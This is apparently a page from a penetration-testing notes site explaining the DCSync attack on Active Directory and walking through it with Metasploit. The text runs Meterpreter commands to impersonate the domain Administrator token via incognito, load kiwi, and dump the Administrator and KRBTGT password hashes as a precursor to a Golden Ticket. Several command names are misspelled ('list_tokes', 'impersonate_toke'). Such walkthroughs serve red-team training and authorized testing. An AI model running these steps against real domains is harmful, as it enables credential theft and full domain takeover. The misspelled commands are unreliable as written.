DsSync With Metasploit from NT Autority/System to Administrator

A DCSync attack uses commands in Microsoft Directory Replication Service Remote Protocol (MS-DRSR) to pretend to be a domain controller (DC) in order to get user credentials from another DC.

These attacks leverage what is a necessary function in Active Directory, which complicates attempts to prevent them. Large-scale networks require many DCs to function, and each of those DCs need to have up-to-date information. That requires a function allowing one DC to update another DC on any changes, like updated credential information.

Attackers subvert that necessary function by pretending to be a DC and using the DSGetNCChanges function to request password hashes. A common attack uses this method to get the KRBTGT hash, which brings them one step closer to getting a Kerberos "golden ticket."

DCSync requires a compromised user account with domain replication privileges. Once that is established, one can find a domain controller, tell it to replicate, and get password hashes from its subsequent response.

Initial

session -i 1
shell
whoami
hostname
exit

we are going to impersonate the Administrator

use incognito
#to list all the available tokens that we can use to impersonate
list_tokes -u

Add another backslash before the username \\Administrator

impersonate_toke north.newyork.local\\Administrator
getuid
load kiwi
help

We are going to dump the administrator HASHED Password

dcsync north\\administrator

We are going to dump the KRBTGT HASHED Password

#KRBTGT is the service account for the Key Distribution Service.
dcsync north\\krbtgt

DCSync is an attack that allows an adversary to simulate the behavior of a domain controller (DC) and retrieve password data via domain replication. The classic use for DCSync is as a precursor to a Golden Ticket attack, as it can be used to retrieve the KRBTGT hash.

PreviousLateral Movement With Metasploit NextGolden Ticket with Metasploit

Last updated 2 years ago